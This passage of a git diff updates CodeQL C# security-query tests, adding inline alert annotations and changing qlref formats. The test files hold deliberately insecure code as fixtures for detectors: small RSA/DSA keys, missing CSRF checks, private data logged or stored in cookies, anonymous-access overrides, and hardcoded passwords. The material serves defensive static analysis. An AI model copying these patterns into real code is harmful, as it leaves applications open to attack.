"Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd" | Connection string | -| InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" : String | InsecureSQLConnection.cs:61:81:61:93 | access to local variable connectString | $@ flows to this SQL connection and does not specify `Encrypt=True`. | InsecureSQLConnection.cs:59:17:59:78 | "Server=1.2.3.4;Database=Anything;UID=ab;Pwd=cd;Encrypt=false" | Connection string | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref index 9809e87e73c5..cd92f9704736 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsecureSQLConnection/InsecureSQLConnection.qlref @@ -1 +1,2 @@ -Security Features/CWE-327/InsecureSQLConnection.ql \ No newline at end of file +query: Security Features/CWE-327/InsecureSQLConnection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs index 56f600e3544d..1d4d4efa7baa 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.cs @@ -7,21 +7,21 @@ public class InsufficientKeySize public void CryptoMethod() { // BAD: Key size is less than 128 - new RC2CryptoServiceProvider().EffectiveKeySize = 64; + new RC2CryptoServiceProvider().EffectiveKeySize = 64; // $ Alert // GOOD: Key size defaults to 128 new RC2CryptoServiceProvider(); // GOOD: Key size is greater than 128 new RC2CryptoServiceProvider().EffectiveKeySize = 256; // BAD: Key size is less than 2048. - DSACryptoServiceProvider dsaBad = new DSACryptoServiceProvider(512); + DSACryptoServiceProvider dsaBad = new DSACryptoServiceProvider(512); // $ Alert // GOOD: Key size defaults to 2048. DSACryptoServiceProvider dsaGood1 = new DSACryptoServiceProvider(); // GOOD: Key size is greater than 2048. DSACryptoServiceProvider dsaGood2 = new DSACryptoServiceProvider(2048); // BAD: Key size is less than 2048. - RSACryptoServiceProvider rsaBad = new RSACryptoServiceProvider(512); + RSACryptoServiceProvider rsaBad = new RSACryptoServiceProvider(512); // $ Alert // GOOD: Key size defaults to 2048. RSACryptoServiceProvider rsaGood1 = new RSACryptoServiceProvider(); // GOOD: Key size is greater than 2048. diff --git a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref index 9b9050c417b4..2e460bd79e19 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-327/InsufficientKeySize/InsufficientKeySize.qlref @@ -1 +1,2 @@ -Security Features/InsufficientKeySize.ql \ No newline at end of file +query: Security Features/InsufficientKeySize.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref index 38fdc5c57385..8948b9773a2d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/global/MissingAntiForgeryTokenValidation.qlref @@ -1 +1,2 @@ -Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql \ No newline at end of file +query: Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs index a86800e51529..ab258cddf3f7 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.cs @@ -4,7 +4,7 @@ public class HomeController : Controller { // BAD: Anti forgery token has been forgotten [HttpPost] - public ActionResult Login() + public ActionResult Login() // $ Alert { return View(); } @@ -55,7 +55,7 @@ public class DerivedUnprotectedController : UnprotectedBaseController { // BAD: No antiforgery validation on this or any base class [HttpPost] - public ActionResult NoInheritedValidation() + public ActionResult NoInheritedValidation() // $ Alert { return View(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref index 38fdc5c57385..8948b9773a2d 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-352/missing/MissingAntiForgeryTokenValidation.qlref @@ -1 +1,2 @@ -Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql \ No newline at end of file +query: Security Features/CWE-352/MissingAntiForgeryTokenValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs index 675b05c29de3..21f925536d73 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.cs @@ -15,19 +15,19 @@ public class ExposureOfPrivateInformationHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { // BAD: Setting a cookie value or values with private data. - ctx.Response.Cookies["MyCookie"].Value = ctx.Request.QueryString["postcode"]; + ctx.Response.Cookies["MyCookie"].Value = ctx.Request.QueryString["postcode"]; // $ Alert Person p = new Person(); - ctx.Response.Cookies["MyCookie"].Value = p.getTelephone(); + ctx.Response.Cookies["MyCookie"].Value = p.getTelephone(); // $ Alert // BAD: Logging private data ILogger logger = new ILogger(); - logger.Warn(p.getTelephone()); + logger.Warn(p.getTelephone()); // $ Alert // BAD: Storing sensitive data in unencrypted local file using (var writeStream = File.Open("telephones.txt", FileMode.Create)) { var writer = new StreamWriter(writeStream); - writer.Write(p.getTelephone()); + writer.Write(p.getTelephone()); // $ Alert writer.Close(); } @@ -59,7 +59,7 @@ public bool IsReusable void OnButtonClicked() { ILogger logger = new ILogger(); - logger.Warn(postcode.Text); + logger.Warn(postcode.Text); // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected index 417692ff79ef..2d92a0387b8a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.expected @@ -1,3 +1,9 @@ +#select +| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | +| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | +| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | edges nodes | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | semmle.label | access to indexer | @@ -6,9 +12,3 @@ nodes | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | semmle.label | call to method getTelephone | | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | semmle.label | access to property Text | subpaths -#select -| ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:18:50:18:84 | access to indexer | access to indexer | -| ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:20:50:20:65 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:24:21:24:36 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:30:26:30:41 | call to method getTelephone | call to method getTelephone | -| ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | Private data returned by $@ is written to an external location. | ExposureOfPrivateInformation.cs:62:21:62:33 | access to property Text | access to property Text | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref index 9d578d17de89..fb1a58d5f9e6 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-359/ExposureOfPrivateInformation.qlref @@ -1 +1,2 @@ -Security Features/CWE-359/ExposureOfPrivateInformation.ql \ No newline at end of file +query: Security Features/CWE-359/ExposureOfPrivateInformation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs index d674b33a0365..0cbc40c0c168 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.cs @@ -8,7 +8,7 @@ public void ProcessRequest(HttpContext ctx) if (FormsAuthentication.Authenticate("username", "password")) { - ctx.Session["foo"] = "bar"; // BAD: Session has not been abandoned + ctx.Session["foo"] = "bar"; // BAD: Session has not been abandoned // $ Alert ctx.Session.Abandon(); ctx.Session["foo"] = "bar"; // GOOD: Session is abandoned } @@ -48,9 +48,9 @@ public void ProcessRequest(HttpContext ctx) if (Membership.ValidateUser("username", "password")) { - ctx.Session["foo"] = "bar"; // BAD: Session not abandoned + ctx.Session["foo"] = "bar"; // BAD: Session not abandoned // $ Alert } - ctx.Session["foo"] = "bar"; // BAD: here as well + ctx.Session["foo"] = "bar"; // BAD: here as well // $ Alert } public bool IsReusable => true; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref index f67c9a36e202..c3ac664edb29 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-384/AbandonSession.qlref @@ -1 +1,2 @@ -Security Features/CWE-384/AbandonSession.ql \ No newline at end of file +query: Security Features/CWE-384/AbandonSession.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref index b8a963200e57..d0d38c4b0117 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/CodeAddedHeader/MissingXFrameOptions.qlref @@ -1 +1,2 @@ -Security Features/CWE-451/MissingXFrameOptions.ql +query: Security Features/CWE-451/MissingXFrameOptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref index b8a963200e57..5a653b7ada09 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/NoHeader/MissingXFrameOptions.qlref @@ -1 +1 @@ -Security Features/CWE-451/MissingXFrameOptions.ql +query: Security Features/CWE-451/MissingXFrameOptions.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref index b8a963200e57..d0d38c4b0117 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeader/MissingXFrameOptions.qlref @@ -1 +1,2 @@ -Security Features/CWE-451/MissingXFrameOptions.ql +query: Security Features/CWE-451/MissingXFrameOptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref index b8a963200e57..d0d38c4b0117 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-451/MissingXFrameOptions/WebConfigAddedHeaderInLocation/MissingXFrameOptions.qlref @@ -1 +1,2 @@ -Security Features/CWE-451/MissingXFrameOptions.ql +query: Security Features/CWE-451/MissingXFrameOptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs index 8370fe93ba0d..c64e6d6a043f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.cs @@ -4,8 +4,8 @@ class PersistentCookie { void M(System.Web.HttpCookie cookie) { - cookie.Expires = DateTime.Now.AddMonths(12); // BAD + cookie.Expires = DateTime.Now.AddMonths(12); // BAD // $ Alert cookie.Expires = DateTime.Now.AddMinutes(3); // GOOD - cookie.Expires = DateTime.Now.AddSeconds(301); // BAD + cookie.Expires = DateTime.Now.AddSeconds(301); // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref index 1d2111ac3fe7..d321b853086e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-539/PersistentCookie/PersistentCookie.qlref @@ -1 +1,2 @@ -Security Features/PersistentCookie.ql \ No newline at end of file +query: Security Features/PersistentCookie.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref index 40d1fce18b5c..95e9bc80fe7f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-548/ASPNetDirectoryListing.qlref @@ -1 +1 @@ -Security Features/CWE-548/ASPNetDirectoryListing.ql \ No newline at end of file +query: Security Features/CWE-548/ASPNetDirectoryListing.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref index 73523f94fc09..1a762e07498e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInCode/RequireSSL.qlref @@ -1 +1,2 @@ -Security Features/CWE-614/RequireSSL.ql \ No newline at end of file +query: Security Features/CWE-614/RequireSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref index 73523f94fc09..1a762e07498e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/AddedInForms/RequireSSL.qlref @@ -1 +1,2 @@ -Security Features/CWE-614/RequireSSL.ql \ No newline at end of file +query: Security Features/CWE-614/RequireSSL.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref index 73523f94fc09..58ec5162739a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/HttpCookiesCorrect/RequireSSL.qlref @@ -1 +1 @@ -Security Features/CWE-614/RequireSSL.ql \ No newline at end of file +query: Security Features/CWE-614/RequireSSL.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref index 73523f94fc09..58ec5162739a 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-614/RequireSSL/RequireSSLMissing/RequireSSL.qlref @@ -1 +1 @@ -Security Features/CWE-614/RequireSSL.ql \ No newline at end of file +query: Security Features/CWE-614/RequireSSL.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs index d446c7ed4864..2508a7c159c3 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/CommentController.cs @@ -12,7 +12,7 @@ public CommentController(IAuthorizationService authorizationService) } // BAD: Any user can access this. - public ActionResult Edit1(int commentId, string text) + public ActionResult Edit1(int commentId, string text) // $ Alert { editComment(commentId, text); return View(); @@ -39,7 +39,7 @@ public ActionResult Edit3(int commentId, string text) // BAD: The AllowAnonymous attribute overrides the Authorize attribute [Authorize] [AllowAnonymous] - public ActionResult Edit4(int commentId, string text) + public ActionResult Edit4(int commentId, string text) // $ Alert { editComment(commentId, text); return View(); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref index 4756d5a76a4f..8fb76298ac58 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/InsecureDirectObjectReference.qlref @@ -1 +1,2 @@ -Security Features/CWE-639/InsecureDirectObjectReference.ql \ No newline at end of file +query: Security Features/CWE-639/InsecureDirectObjectReference.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs index 503b2955933d..5ff2e2187684 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/MiscTestControllers.cs @@ -23,7 +23,7 @@ public class AController : BaseController { public class BaseAuthController : Controller { // BAD - A subclass of AllowAnonymous is used [MyAllowAnonymous] - public virtual ActionResult EditAnon(int id) { return View(); } + public virtual ActionResult EditAnon(int id) { return View(); } // $ Alert } public class BController : BaseAuthController { @@ -31,7 +31,7 @@ public class BController : BaseAuthController { public ActionResult Edit3(int id) { return View(); } // BAD - MyAllowAnonymous is inherited from overridden method - public override ActionResult EditAnon(int id) { return View(); } + public override ActionResult EditAnon(int id) { return View(); } // $ Alert } [AllowAnonymous] @@ -42,7 +42,7 @@ public class BaseAnonController : Controller { public class CController : BaseAnonController { // BAD - AllowAnonymous is inherited from base class and overrides Authorize [Authorize] - public ActionResult Edit4(int id) { return View(); } + public ActionResult Edit4(int id) { return View(); } // $ Alert } [Authorize] diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs index a41c32db6411..adb24ce0c3c9 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/MVCTests/ProfileController.cs @@ -11,7 +11,7 @@ public ActionResult Edit1(int profileId, string text) { // BAD: The AllowAnonymous attribute overrides the Authorize attribute on the class. [AllowAnonymous] - public ActionResult Edit2(int profileId, string text) { + public ActionResult Edit2(int profileId, string text) { // $ Alert editProfileName(profileId, text); return View(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs index 974869a0af4b..bdcf80a010fe 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/EditComment.aspx.cs @@ -4,7 +4,7 @@ class EditComment : System.Web.UI.Page { // BAD - Any user can access this method. - protected void btn1_Click(object sender, EventArgs e) { + protected void btn1_Click(object sender, EventArgs e) { // $ Alert string commentId = Request.QueryString["Id"]; Comment comment = getCommentById(commentId); comment.Text = "xyz"; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref index 4756d5a76a4f..8fb76298ac58 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-639/WebFormsTests/InsecureDirectObjectReference.qlref @@ -1 +1,2 @@ -Security Features/CWE-639/InsecureDirectObjectReference.ql \ No newline at end of file +query: Security Features/CWE-639/InsecureDirectObjectReference.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected index 7de4c593e25d..299285d97174 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.expected @@ -1,8 +1,8 @@ +#select +| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | +| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | edges nodes | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | semmle.label | "Password=12345" | | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | semmle.label | "User Id=12345" | subpaths -#select -| HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | HardcodedCredentials.cs:55:48:55:63 | "Password=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:55:30:55:64 | object creation of type SqlConnection | object creation of type SqlConnection | -| HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | HardcodedCredentials.cs:57:49:57:63 | "User Id=12345" | 'ConnectionString' property includes hard-coded credentials set in $@. | HardcodedCredentials.cs:57:31:57:64 | object creation of type SqlConnection | object creation of type SqlConnection | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref index d240503b7731..da05cee17d43 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedConnectionString.qlref @@ -1 +1,2 @@ -Security Features/CWE-798/HardcodedConnectionString.ql \ No newline at end of file +query: Security Features/CWE-798/HardcodedConnectionString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs index 840d65b19653..4a9bada259b2 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.cs @@ -13,7 +13,7 @@ public void ProcessRequest(HttpContext ctx) string password = ctx.Request.QueryString["password"]; // BAD: Inbound authentication made by comparison to string literal - if (password == "myPa55word") + if (password == "myPa55word") // $ Alert[cs/hardcoded-credentials] { ctx.Response.Redirect("login"); } @@ -29,7 +29,7 @@ public void ProcessRequest(HttpContext ctx) // BAD: Create a membership user with hardcoded username MembershipUser user = new MembershipUser( providerName: "provider", - name: "username", + name: "username", // $ Alert[cs/hardcoded-credentials] providerUserKey: "username", email: "foo@bar.com", passwordQuestion: "Hardcoded question.", @@ -43,18 +43,18 @@ public void ProcessRequest(HttpContext ctx) lastLockoutDate: DateTime.Now ); // BAD: Set the password to a hardcoded string literal - user.ChangePassword(password, "myNewPa55word"); + user.ChangePassword(password, "myNewPa55word"); // $ Alert[cs/hardcoded-credentials] - byte[] rawCertData = new byte[] { 0x20, 0x20, 0x20 }; + byte[] rawCertData = new byte[] { 0x20, 0x20, 0x20 }; // $ Alert[cs/hardcoded-credentials] // BAD: Passing a literal certificate and password to an X509 certificate constructor X509Certificate2 cert = new X509Certificate2( - rawCertData, - "myPa55word"); + rawCertData, // $ Sink[cs/hardcoded-credentials] + "myPa55word"); // $ Alert[cs/hardcoded-credentials] // BAD: Passing literal Password to connection string - SqlConnection conn = new 